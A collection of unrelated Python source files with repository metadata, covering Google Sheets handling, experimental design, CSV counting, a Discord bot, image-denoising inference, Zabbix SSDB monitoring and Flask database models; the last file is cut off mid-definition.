print()
| 17.857143 | 86 | 0.568 |
a0ce94f0ee33cd51c8683516ee3c5585045ad570
| 1,879 |
py
|
Python
|
imwievaluation/spreadsheet.py
|
ESchae/IMWIEvaluation
|
2fa661711b7b65cba25c1fa9ba69e09e75c7655f
|
[
"MIT"
] | null | null | null |
imwievaluation/spreadsheet.py
|
ESchae/IMWIEvaluation
|
2fa661711b7b65cba25c1fa9ba69e09e75c7655f
|
[
"MIT"
] | null | null | null |
imwievaluation/spreadsheet.py
|
ESchae/IMWIEvaluation
|
2fa661711b7b65cba25c1fa9ba69e09e75c7655f
|
[
"MIT"
] | 1 |
2019-10-19T10:11:17.000Z
|
2019-10-19T10:11:17.000Z
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials as sa_creds
# TODO: after generating, save key + title / lecturer for later use!
class SpreadsheetHandler(object):
""" Class to handle data transfer via Google Spreadsheets Python API.
Uses gspread: https://github.com/burnash/gspread.
"""
def __init__(self, creds_file='client_secret.json'):
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
creds = sa_creds.from_json_keyfile_name(creds_file, scope)
self._client = gspread.authorize(creds)
def generate(self, title, worksheet_title='Teilnehmer',
header=('Vorname', 'Nachname', 'E-Mail')):
sh = self._client.create(title)
# make spreadsheet accessible to everyone via url
# also accessible for people without google account
sh.share(None, perm_type='anyone', role='writer')
# configure the first worksheet of the spreadsheet (index 0)
worksheet = sh.get_worksheet(0)
worksheet.append_row(header)
worksheet.update_title(worksheet_title)
# print(worksheet.row_values(1))
# worksheet.append_row(['Vorname', 'Nachname', 'E-Mail'])
return Spreadsheet(sh, worksheet)
def get(self, title):
sh = self._client.open(title)
worksheet = sh.get_worksheet(0)
return Spreadsheet(sh, worksheet)
def get_by_key(self, key):
sh = self._client.open_by_key(key)
worksheet = sh.get_worksheet(0)
return Spreadsheet(sh, worksheet)
class Spreadsheet(object):
def __init__(self, sh, worksheet):
self.sh = sh
self.worksheet = worksheet
self.url = 'https://docs.google.com/spreadsheets/d/%s' % sh.id
def get_data(self):
return self.worksheet.get_all_records()
| 35.45283 | 78 | 0.664715 |
9d09f33df7bb54978c9ad78e06bf86dc026107c3
| 127 |
py
|
Python
|
Online-Judges/DimikOJ/Python/03-falling-numbers.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | 3 |
2021-06-15T01:19:23.000Z
|
2022-03-16T18:23:53.000Z
|
Online-Judges/DimikOJ/Python/03-falling-numbers.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
Online-Judges/DimikOJ/Python/03-falling-numbers.py
|
shihab4t/Competitive-Programming
|
e8eec7d4f7d86bfa1c00b7fbbedfd6a1518f19be
|
[
"Unlicense"
] | null | null | null |
number = 1000
for i in range(1,201):
for j in range(1, 6):
print(number, end ="\t")
number -= 1
print()
| 21.166667 | 32 | 0.511811 |
a06e87374eededc329a872da467cdb5f0696d759
| 2,091 |
py
|
Python
|
.venv/Lib/site-packages/dexpy/box_behnken.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 21 |
2016-10-19T18:13:03.000Z
|
2021-11-02T13:58:31.000Z
|
.venv/Lib/site-packages/dexpy/box_behnken.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 43 |
2016-10-11T20:56:28.000Z
|
2020-08-20T16:39:38.000Z
|
.venv/Lib/site-packages/dexpy/box_behnken.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 6 |
2017-12-22T03:47:37.000Z
|
2021-03-13T03:45:26.000Z
|
"""Functions for building Box-Behnken designs."""
import dexpy.design as design
import pandas as pd
import numpy as np
import os
def build_box_behnken(factor_count, center_points = 5):
"""Builds a Box-Behnken design.create_model_matrix
Box-Behnken designs are response surface designs, specially made to require
only 3 levels, coded as -1, 0, and +1. Box-Behnken designs are available
for 3 to 21 factors. They are formed by combining two-level factorial
designs with incomplete block designs. This procedure creates designs with
desirable statistical properties but, most importantly, with only a
fraction of the experiments required for a three-level factorial. Because
there are only three levels, the quadratic model is appropriate.
**Center Points**
Center points, as implied by the name, are points with all levels set to
coded level 0 - the midpoint of each factor range: (0, 0)
Center points are usually repeated 4-6 times to get a good estimate of
experimental error (pure error).
**Categorical Factors**
You may also add categorical factors to this design. This will cause the
number of runs generated to be multiplied by the number of combinations of
the categorical factor levels.
Box, G.E.P., and Behnken, D.W., "Some New Three Level Designs for the Study
of Quantitative Variables", Technometrics, 2, pp. 455-475, 1960.
:param factor_count: The number of factors to build for.
:type factor_count: int
:param center_points: The number of center points to include in the design.
:type center_points: integer
"""
factor_names = design.get_factor_names(factor_count)
csv_path = os.path.join(os.path.dirname(__file__), "data", "BB_{:02d}.csv".format(factor_count))
factor_data = pd.read_csv(csv_path, names=factor_names)
if center_points > 0:
center_point_df = pd.DataFrame(0, columns=factor_names, index=np.arange(len(factor_data), len(factor_data) + center_points))
factor_data = factor_data.append(center_point_df)
return factor_data
| 41 | 132 | 0.738881 |
268a40b28b6bce9be9684d9c544b56ffbffcfb51
| 2,610 |
py
|
Python
|
python/csv_occurence_count.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 89 |
2015-02-13T13:46:06.000Z
|
2022-03-13T16:42:44.000Z
|
python/csv_occurence_count.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 91 |
2015-03-12T13:31:36.000Z
|
2022-01-14T07:37:37.000Z
|
python/csv_occurence_count.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 138 |
2015-03-04T15:23:43.000Z
|
2022-03-09T15:11:52.000Z
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import argparse
import codecs
from collections import OrderedDict
import sys
import openapc_toolkit as oat
ARG_HELP_STRINGS = {
"source_file": "The source csv file",
"count_column": "The numerical index of the column where values " +
"should be counted",
"encoding": "The encoding of the CSV file. Setting this argument will " +
"disable automatic guessing of encoding.",
"sort": "sort results by occurence count"
}
def main():
parser = argparse.ArgumentParser()
parser.add_argument("source_file", help=ARG_HELP_STRINGS["source_file"])
parser.add_argument("count_column", type=int, help=ARG_HELP_STRINGS["count_column"])
parser.add_argument("-e", "--encoding", help=ARG_HELP_STRINGS["encoding"])
parser.add_argument("-s", "--sort", action="store_true", help=ARG_HELP_STRINGS["sort"])
args = parser.parse_args()
enc = None
if args.encoding:
try:
codec = codecs.lookup(args.encoding)
msg = "Encoding '{}' found in Python's codec collection as '{}'"
print(msg.format(args.encoding, codec.name))
enc = args.encoding
except LookupError:
oat.print_r("Error: '" + args.encoding + "' not found Python's " +
"codec collection. Either look for a valid name here " +
"(https://docs.python.org/2/library/codecs.html#standard-" +
"encodings) or omit this argument to enable automated " +
"guessing.")
sys.exit()
header, content = oat.get_csv_file_content(args.source_file, enc)
column_name = "column " + str(args.count_column)
if header:
header_line = header[0]
column_name = header_line[args.count_column]
oat.print_g("Performing occurence count in column '" + column_name + "'")
occurence_dict = OrderedDict()
for line in content:
try:
value = line[args.count_column]
except IndexError as ie:
oat.print_y("IndexError ({}) at line {}, skipping...".format(ie.message, line))
continue
if value not in occurence_dict:
occurence_dict[value] = 1
else:
occurence_dict[value] += 1
if args.sort:
occurence_dict = OrderedDict(sorted(occurence_dict.items(), key=lambda x: x[1],
reverse=True))
for item in occurence_dict.items():
print(item[0] + ": " + str(item[1]))
if __name__ == '__main__':
main()
| 35.27027 | 91 | 0.603831 |
cd45ff18e5cab22c9aa35e16fd6dc9151e5ed80b
| 980 |
py
|
Python
|
customclient.py
|
Strange-Penguins/Stython
|
f4f96383681f311dd0ecceddf15417c78c974830
|
[
"MIT"
] | 1 |
2021-03-13T21:50:12.000Z
|
2021-03-13T21:50:12.000Z
|
customclient.py
|
Strange-Penguins/Stython
|
f4f96383681f311dd0ecceddf15417c78c974830
|
[
"MIT"
] | 4 |
2021-03-13T22:22:11.000Z
|
2021-03-14T22:17:49.000Z
|
customclient.py
|
Strange-Penguins/Stython
|
f4f96383681f311dd0ecceddf15417c78c974830
|
[
"MIT"
] | null | null | null |
from discord.ext.commands import Bot
import discord
from datetime import datetime
import platform
import databasemanager as dbm
class CustomClient(Bot):
def __init__(self, **options):
self.creation_date = datetime.now()
super().__init__(**options)
self.loop.create_task(self.greet())
self.db = dbm.DatabaseManager()
async def greet(self):
"""Prints Info one time on startup"""
await self.wait_until_ready()
now_date = datetime.now()
time_delta = now_date - self.creation_date
print(
f"----------\n[{now_date.strftime('%H:%M:%S')}] {self.user} started and connection established sucessfully."
f"(Took:{round(time_delta.microseconds / 1_000_000, 1)}sec)\n"
f">> Guilds: {[guild.name for guild in self.guilds]}\n"
f">> Running on {platform.system()} "
f"- Discord.py: {discord.__version__} - Python: {platform.python_version()}"
)
| 35 | 120 | 0.62551 |
f846bc0871bba8028e0117e09f0110f19b20bd95
| 811 |
py
|
Python
|
apps/utils/nodemgr.py
|
dongdawang/ssrmgmt
|
a41e595aec503dcb191a20ea8d58233bbb8f2db0
|
[
"MIT"
] | null | null | null |
apps/utils/nodemgr.py
|
dongdawang/ssrmgmt
|
a41e595aec503dcb191a20ea8d58233bbb8f2db0
|
[
"MIT"
] | null | null | null |
apps/utils/nodemgr.py
|
dongdawang/ssrmgmt
|
a41e595aec503dcb191a20ea8d58233bbb8f2db0
|
[
"MIT"
] | null | null | null |
from django.core.cache import cache
class NodeStatusCacheMgr(object):
def __init__(self):
pass
def set_node_status(self, id, status):
key = "ssrmgmt_node_status_" + str(id)
if status:
val = 'online'
else:
val = 'offline'
cache.set(key, val, 80)
def get_node_status(self, id):
key = "ssrmgmt_node_status_" + str(id)
if key in cache:
return cache.get(key)
else:
return 'offline'
def set_port_ips(self, port, ips: list):
key = "ssrmgmt_port_status_" + str(port)
cache.set(key, ips, 80)
def get_port_ips(self, port):
key = "ssrmgmt_port_status_" + str(port)
if key in cache:
return cache.get(key)
else:
return []
| 24.575758 | 48 | 0.553637 |
3e34a3ee4a65e0ac70b41bf3151a26c8b3ce1fce
| 6,781 |
py
|
Python
|
official/cv/brdnet/infer/sdk/main.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/brdnet/infer/sdk/main.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/brdnet/infer/sdk/main.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
'''
The scripts to execute sdk infer
'''
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import argparse
import os
import glob
import time
import math
import PIL.Image as Image
import MxpiDataType_pb2 as MxpiDataType
import numpy as np
from StreamManagerApi import StreamManagerApi, InProtobufVector, \
MxProtobufIn, StringVector
def parse_args():
"""set and check parameters."""
parser = argparse.ArgumentParser(description="BRDNet process")
parser.add_argument("--pipeline", type=str, default=None, help="SDK infer pipeline")
parser.add_argument("--clean_image_path", type=str, default=None, help="root path of image without noise")
parser.add_argument('--image_width', default=500, type=int, help='resized image width')
parser.add_argument('--image_height', default=500, type=int, help='resized image height')
parser.add_argument('--channel', default=3, type=int
, help='image channel, 3 for color, 1 for gray')
parser.add_argument('--sigma', type=int, default=15, help='level of noise')
args_opt = parser.parse_args()
return args_opt
def calculate_psnr(image1, image2):
image1 = np.float64(image1)
image2 = np.float64(image2)
diff = image1 - image2
diff = diff.flatten('C')
rmse = math.sqrt(np.mean(diff**2.))
return 20*math.log10(1.0/rmse)
def send_source_data(appsrc_id, tensor, stream_name, stream_manager):
"""
Construct the input of the stream,
send inputs data to a specified stream based on streamName.
Returns:
bool: send data success or not
"""
tensor_package_list = MxpiDataType.MxpiTensorPackageList()
tensor_package = tensor_package_list.tensorPackageVec.add()
array_bytes = tensor.tobytes()
tensor_vec = tensor_package.tensorVec.add()
tensor_vec.deviceId = 0
tensor_vec.memType = 0
for i in tensor.shape:
tensor_vec.tensorShape.append(i)
tensor_vec.dataStr = array_bytes
tensor_vec.tensorDataSize = len(array_bytes)
key = "appsrc{}".format(appsrc_id).encode('utf-8')
protobuf_vec = InProtobufVector()
protobuf = MxProtobufIn()
protobuf.key = key
protobuf.type = b'MxTools.MxpiTensorPackageList'
protobuf.protobuf = tensor_package_list.SerializeToString()
protobuf_vec.push_back(protobuf)
ret = stream_manager.SendProtobuf(stream_name, appsrc_id, protobuf_vec)
if ret < 0:
print("Failed to send data to stream.")
return False
return True
def main():
"""
read pipeline and do infer
"""
args = parse_args()
# init stream manager
stream_manager_api = StreamManagerApi()
ret = stream_manager_api.InitManager()
if ret != 0:
print("Failed to init Stream manager, ret=%s" % str(ret))
return
# create streams by pipeline config file
with open(os.path.realpath(args.pipeline), 'rb') as f:
pipeline_str = f.read()
ret = stream_manager_api.CreateMultipleStreams(pipeline_str)
if ret != 0:
print("Failed to create Stream, ret=%s" % str(ret))
return
stream_name = b'brdnet'
infer_total_time = 0
psnr = [] #after denoise
image_list = glob.glob(os.path.join(args.clean_image_path, '*'))
if not os.path.exists("./outputs"):
os.makedirs("./outputs")
with open("./outputs/denoise_results.txt", 'w') as f:
for image in sorted(image_list):
print("Denosing image:", image)# read image
if args.channel == 3:
img_clean = np.array(Image.open(image).resize((args.image_width, args.image_height), \
Image.ANTIALIAS), dtype='float32') / 255.0
else:
img_clean = np.expand_dims(np.array(Image.open(image).resize((args.image_width, \
args.image_height), Image.ANTIALIAS).convert('L'), dtype='float32') / 255.0, axis=2)
np.random.seed(0) #obtain the same random data when it is in the test phase
img_test = img_clean + np.random.normal(0, args.sigma/255.0, img_clean.shape).astype(np.float32)#HWC
noise_image = np.expand_dims(img_test.transpose((2, 0, 1)), 0)#NCHW
if not send_source_data(0, noise_image, stream_name, stream_manager_api):
return
# Obtain the inference result by specifying streamName and uniqueId.
key_vec = StringVector()
key_vec.push_back(b'modelInfer')
start_time = time.time()
infer_result = stream_manager_api.GetProtobuf(stream_name, 0, key_vec)
infer_total_time += time.time() - start_time
if infer_result.size() == 0:
print("inferResult is null")
return
if infer_result[0].errorCode != 0:
print("GetProtobuf error. errorCode=%d" % (infer_result[0].errorCode))
return
result = MxpiDataType.MxpiTensorPackageList()
result.ParseFromString(infer_result[0].messageBuf)
res = np.frombuffer(result.tensorPackageVec[0].tensorVec[0].dataStr, dtype='<f4')
y_predict = res.reshape(args.channel, args.image_height, args.image_width)
img_out = y_predict.transpose((1, 2, 0))#HWC
img_out = np.clip(img_out, 0, 1)
psnr_denoised = calculate_psnr(img_clean, img_out)
psnr.append(psnr_denoised)
print(image, ": psnr_denoised: ", " ", psnr_denoised)
print(image, ": psnr_denoised: ", " ", psnr_denoised, file=f)
filename = image.split('/')[-1].split('.')[0] # get the name of image file
img_out.tofile(os.path.join("./outputs", filename+'_denoise.bin'))
psnr_avg = sum(psnr)/len(psnr)
print("Average PSNR:", psnr_avg)
print("Average PSNR:", psnr_avg, file=f)
print("Testing finished....")
print("=======================================")
print("The total time of inference is {} s".format(infer_total_time))
print("=======================================")
# destroy streams
stream_manager_api.DestroyAllStreams()
if __name__ == '__main__':
main()
| 40.849398 | 112 | 0.641203 |
9042573579966f12375d19d6a86769ffe339bb69
| 416 |
py
|
Python
|
PMIa/2014/danilov_d_a/task_2_6.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2014/danilov_d_a/task_2_6.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
PMIa/2014/danilov_d_a/task_2_6.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task 2, Variant 6.
# Write a program that prints your favourite quotation attributed to Jesus Christ;
# the author must be mentioned on a separate line.
# Danilov D.A.
# 20.05.2016
# input() is used only to pause: the prompt string doubles as the program's
# whole output (quotation, author line, and "press Enter to finish" note).
input("Не думайте, что Я пришел принести мир на землю; не мир пришел Я принести, но меч.\n\n\n\t\t\t\t\t Иисус Христос \n\n\nНажмите Enter для завершения")
| 69.333333 | 206 | 0.766827 |
5f3b93cf85a7fe66bdfadbd695beb1d00ffe6c81
| 1,693 |
py
|
Python
|
scripts/pip_sequential.py
|
guruvamsi-policharla/noisy-krotov
|
c5397d9dbde68d06f17e88620d6a6b2c74664841
|
[
"BSD-3-Clause"
] | 49 |
2018-11-07T06:43:33.000Z
|
2022-03-18T20:53:06.000Z
|
scripts/pip_sequential.py
|
guruvamsi-policharla/noisy-krotov
|
c5397d9dbde68d06f17e88620d6a6b2c74664841
|
[
"BSD-3-Clause"
] | 94 |
2018-11-06T20:15:04.000Z
|
2022-01-06T09:06:15.000Z
|
scripts/pip_sequential.py
|
qucontrol/krotov
|
9f9a22336c433dc3a37637ce8cc8324df4290b46
|
[
"BSD-3-Clause"
] | 20 |
2018-11-06T20:03:11.000Z
|
2022-03-12T05:29:21.000Z
|
#!/usr/bin/env python
"""Stand-in for pip that processes packages sequentially.
`pip install <packages>` compiles *all* the given packages before installing
them. This can be a problem if the compilation of one package depends on other
packages being installed (most likely, cython/numpy). This script provides an
ad-hoc solution by translating `pip install <packages` into a sequential `pip
install <package>` for every package in <packages>. It can be used in tox.ini
as
install_command=
python scripts/pip_sequential.py install {opts} -- {packages}
"""
import subprocess
import sys
def main(argv=None):
    """Run one pip invocation per package spec given after ``--``.

    ``pip install <packages>`` builds *all* the given packages before
    installing any of them, which breaks packages whose build step needs
    another package (typically cython/numpy) already installed.  This
    entry point translates the call into sequential
    ``pip <command> [options] <spec>`` invocations, one per spec.

    :param argv: argument vector; defaults to ``sys.argv``.  Expected
        layout is ``[prog, command, *options, '--', *specs]``.
    :return: exit code — ``0`` on success, ``1`` on a usage error or when
        any pip invocation fails.
    """
    if argv is None:
        argv = sys.argv
    command = 'help'
    options = []
    args = []
    if len(argv) > 1 and not argv[1].startswith('-'):
        command = argv[1]
        remaining = argv[2:]
    else:
        # No explicit command: argv[1] (if present) is an option and must
        # still be scanned below.  The previous version always iterated
        # argv[2:], silently dropping argv[1] in this branch.
        remaining = argv[1:]
    bucket = options
    for arg in remaining:
        if arg == '--':
            # everything before '--' is definitely an option, everything
            # afterwards *may* be an arg
            bucket = args
        else:
            if arg.startswith('-'):
                options.append(arg)
            else:
                bucket.append(arg)
    if len(args) == 0:
        print("Usage: %s command [options] -- <specs>" % __file__)
        return 1
    try:
        for arg in args:
            # check=True raises CalledProcessError on a non-zero pip exit,
            # aborting the remaining specs.
            cmd = [sys.executable, '-m', 'pip', command, *options, arg]
            print(" ".join(cmd))
            subprocess.run(cmd, check=True)
    except subprocess.CalledProcessError as exc_info:
        print("ERROR: %s" % exc_info)
        return 1
    else:
        return 0
if __name__ == '__main__':
sys.exit(main())
| 30.232143 | 78 | 0.583579 |
5f4bcc06cf34f85942da00f7dbf95407df0df76d
| 724 |
py
|
Python
|
20-fs-ias-lec/groups/13-sneakernet/code/logMerge/LogMergeTests.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 8 |
2020-03-17T21:12:18.000Z
|
2021-12-12T15:55:54.000Z
|
20-fs-ias-lec/groups/13-sneakernet/code/logMerge/LogMergeTests.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 2 |
2021-07-19T06:18:43.000Z
|
2022-02-10T12:17:58.000Z
|
20-fs-ias-lec/groups/13-sneakernet/code/logMerge/LogMergeTests.py
|
Kyrus1999/BACnet
|
5be8e1377252166041bcd0b066cce5b92b077d06
|
[
"MIT"
] | 25 |
2020-03-20T09:32:45.000Z
|
2021-07-18T18:12:59.000Z
|
# Tests for LogMerge.py
# Authors: Günes Aydin, Joey Zgraggen, Nikodem Kernbach
# VERSION: 1.0
import os
import unittest
import LogMerge
class LogMergeTests(unittest.TestCase):
def setUp(self):
self.lm = LogMerge.LogMerge()
def test_something_1(self):
pass
def test_something_2(self):
pass
@classmethod
def tearDownClass(cls): # Deletes testing files
(_, _, filenames) = next(os.walk(os.getcwd()))
for filename in filenames:
if filename.endswith('.key') or filename.endswith('.sqlite') or filename.endswith('.pcap'):
os.remove(filename)
if __name__ == '__main__':
# Run all tests from inside this file
unittest.main()
| 22.625 | 103 | 0.650552 |
39b790ec8e13aec6264fe2ddd36eec5e5a854cd2
| 2,699 |
py
|
Python
|
Aufgaben/abgabe1.py
|
JoshuaJoost/GNN_SS20
|
6b905319f2e51b71569354c347805abce9df3cb1
|
[
"MIT"
] | null | null | null |
Aufgaben/abgabe1.py
|
JoshuaJoost/GNN_SS20
|
6b905319f2e51b71569354c347805abce9df3cb1
|
[
"MIT"
] | null | null | null |
Aufgaben/abgabe1.py
|
JoshuaJoost/GNN_SS20
|
6b905319f2e51b71569354c347805abce9df3cb1
|
[
"MIT"
] | null | null | null |
#Run cell
#%%
__authors__ = "Rosario Allegro (1813064), Sedat Cakici (1713179), Joshua Joost (1626034)"
# maintainer = who fixes buggs?
__maintainer = __authors__
__date__ = "2020-04-21"
__version__ = "0.5"
__status__ = "Test"
import numpy as np
import matplotlib
from matplotlib import pyplot as plt
print(f"numpy_version: {np.version.version}")
print(f"matplotlib version: {matplotlib.__version__}")
## Value specifications Task 1 --------------------------------
# Fixed by the assignment -- do not change these values.
DELTA_T = 0.01                            # Euler integration step size
X_VALUES = np.array([-7.0, -0.2, 8.0])    # start values for the three trajectories
## static diagram values --------------------------------------
# Points to sample the curve
numberOfSamplePoints = 64
# diagram dimensions (x row and y row), has to stay 2
DIAG_DIM = 2
# diagram x-axis range
xMin = -4
xMax = 4
# curve to plot: y = x - x^3
yFunc = lambda x: x - (x ** 3)
## delta train function ------------------------------------------
trainSamplingPoints = numberOfSamplePoints
# one explicit-Euler step of x' = x - x^3
deltaLernFunc = lambda x, delta_t: x + delta_t * (x - x ** 3)
def generateTrainValues(startValue, trainIterations = trainSamplingPoints, trainFunc = deltaLernFunc):
    """Roll out ``trainIterations`` Euler steps starting from ``startValue``.

    Each stored entry is ``trainFunc`` (with step size ``DELTA_T``) applied
    to the previous entry; the start value itself is not stored.
    """
    rollout = np.zeros(trainIterations)
    state = startValue
    for step in range(trainIterations):
        state = trainFunc(state, DELTA_T)
        rollout[step] = state
    return rollout
## Calculate plot values ----------------------------------------
# row 0 = x samples, row 1 = y samples of the base curve
pltValues = np.zeros((DIAG_DIM, numberOfSamplePoints))
# generate x values, evenly spaced over [xMin, xMax]
pltValues[0] = np.linspace(xMin, xMax, numberOfSamplePoints, endpoint=True)
# generate y values of the base curve
for yi in range(numberOfSamplePoints):
    pltValues[1][yi] = yFunc(pltValues[0][yi])
# print(pltValues)
## Calculate delta train values --------------------------------
# one Euler trajectory per start value in X_VALUES
trainValues = np.zeros((X_VALUES.size, trainSamplingPoints))
for i in range(X_VALUES.size):
    trainValues[i] = generateTrainValues(X_VALUES[i])
#print(trainValues)
## plot diagram --------------------------------------------------
xMinValue = xMin
xMaxValue = xMax
yMinValue = np.min(pltValues[1])
yMaxValue = np.max(pltValues[1])
plt.plot(pltValues[0], pltValues[1], label = 'basic function')
# trajectories are plotted against the same x grid (index-wise), one colour each
plt.plot(pltValues[0], trainValues[0], marker='o', markersize=2, color='green', label=X_VALUES[0], alpha=0.8)
plt.plot(pltValues[0], trainValues[1], marker='o', markersize=2, color='red', label=X_VALUES[1], alpha=0.8)
plt.plot(pltValues[0], trainValues[2], marker='o', markersize=2, color='blue', label=X_VALUES[2], alpha=0.8)
# pad the y range by 10% so markers at the extremes stay visible
plt.axis([xMinValue, xMaxValue, yMinValue + (yMinValue / 10), yMaxValue + (yMaxValue / 10)])
plt.legend()
plt.show()
# The attractor runs towards a fixed point (in the direction of the saddle point value y = 0)
| 32.130952 | 109 | 0.665061 |
f2cc69939b09b877533ade341e1e1b76b0a02782
| 1,568 |
py
|
Python
|
monitoring/zabbix/zabbix_collections/ssdb/ssdb.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 63 |
2018-02-04T03:31:22.000Z
|
2022-03-07T08:27:39.000Z
|
monitoring/zabbix/zabbix_collections/ssdb/ssdb.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 3 |
2020-06-15T03:41:03.000Z
|
2020-06-15T03:41:04.000Z
|
monitoring/zabbix/zabbix_collections/ssdb/ssdb.py
|
smthkissinger/docker-images
|
35e868295d04fa780325ada4168381f1e80e8fe4
|
[
"BSD-3-Clause"
] | 40 |
2018-01-22T16:31:16.000Z
|
2022-03-08T04:40:42.000Z
|
#!/bin/env python
import sys,json,socket,re
from SSDB import SSDB
def get_stats(ip, port):
    """Fetch the raw ``info cmd`` statistics from the SSDB server.

    Returns the flat key/value list with the leading status token stripped.
    """
    conn = SSDB(ip, port)
    reply = conn.request('info', ['cmd'])
    return reply.data[1:]
def discovery_cmd(info):
    """Build Zabbix low-level-discovery JSON from an SSDB info list.

    ``info`` alternates key, value, key, value, ...; every key (even index)
    whose name contains ``cmd`` becomes one discovery entry.
    """
    entries = [{'{#SSDBCMD}': key} for key in info[::2] if 'cmd' in key]
    return json.dumps({'data': entries})
def check(ip, port):
    """Availability probe: 1 if a set/get round trip against SSDB works, else 0."""
    conn = SSDB(ip, port)
    try:
        conn.request('set', ['zabbix', '123'])
        conn.request('get', ['zabbix'])
        return 1
    except:  # deliberately broad: any failure just means "not available"
        return 0
if __name__ == '__main__':
    # Python 2 CLI for Zabbix: usage is `ssdb.py <cmd> [filter]`.
    ip = socket.gethostbyname(socket.getfqdn(socket.gethostname()))
    port = 8888
    stats = get_stats(ip,port)
    # Fold the flat key/value list into a dict; the 'replication' key is
    # disambiguated by appending the first word of its value (there can be
    # several replication sections).
    res = {}
    for i in range(0,len(stats),2):
        if stats[i] == 'replication':
            stats[i] = stats[i]+'.'+stats[i+1].split()[0]
        res[stats[i]] = stats[i+1]
    cmd = sys.argv[1]
    filter = sys.argv[2] if len(sys.argv) > 2 else ''
    if cmd == 'discover':
        # Zabbix low-level discovery of per-command counters.
        print discovery_cmd(stats)
    elif cmd.find('cmd') != -1:
        # Per-command stats look like "total: N ... proc: N ...": pull out
        # the three name/number pairs and print the one named by `filter`.
        p = re.compile('(\w+):\s+(\d+)\s+(\w+):\s+(\d+)\s+(\w+):\s+(\d+)')
        m = p.match(res[cmd])
        d=dict(zip(m.group(1,3,5),m.group(2,4,6)))
        #print d[filter]
        print d.get(filter,'not support')
    elif cmd == 'replication.client':
        # Print the value of the `filter` field from the client section.
        for i in res['replication.client'].split('\n'):
            if i.split(':')[0].strip() == filter:
                print i.split(':')[1].strip()
    elif cmd == 'binlogs':
        # Last line of the binlogs section holds the value we report.
        print res['binlogs'].split('\n')[-1].split(':')[-1].strip()
    elif cmd == 'available':
        print check(ip,port)
    else:
        print res.get(cmd,'not support')
| 26.133333 | 70 | 0.571429 |
840126f73a90b431b76708cb45f3372a479f93d6
| 1,744 |
py
|
Python
|
BluePrint/apps/models.py
|
CodeMath/jinrockets
|
6bb26e9ca66ba951ab2d34bf1ffe79b2c605963f
|
[
"MIT"
] | null | null | null |
BluePrint/apps/models.py
|
CodeMath/jinrockets
|
6bb26e9ca66ba951ab2d34bf1ffe79b2c605963f
|
[
"MIT"
] | null | null | null |
BluePrint/apps/models.py
|
CodeMath/jinrockets
|
6bb26e9ca66ba951ab2d34bf1ffe79b2c605963f
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
from apps import db
class User(db.Model):
    """Account record; `id` is the user-chosen login string."""
    id = db.Column(db.String(255), primary_key=True)
    password = db.Column(db.String(255))
    date = db.Column(db.DateTime(), default=db.func.now())
    # Entered at sign-up: one of (teenager, freshman, returning student,
    # job seeker, employee); the default literal means "freshman".
    user_category=db.Column(db.String(255),default="신입생")
    input_jobs=db.Column(db.String(255),default="0")
class Job(db.Model):
    """A user's career/department review entry (one row per submission)."""
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.String(255), db.ForeignKey(User.id))
    user = db.relationship('User', backref=db.backref('jobs', cascade='all, delete-orphan'))
    write_date = db.Column(db.DateTime(), default=db.func.now())
    # Division / faculty
    department=db.Column(db.String(255))
    # Major (default literal: "none")
    major=db.Column(db.String(255),default=u"없음")
    # Nickname (default literal: "JinRocket user")
    nic_name=db.Column(db.String(255),default=u"진로켓 유저")
    # Career path (default literal: "none")
    job=db.Column(db.String(255),default=u"없음")
    # One-line review of the department (default literal: "It is good.")
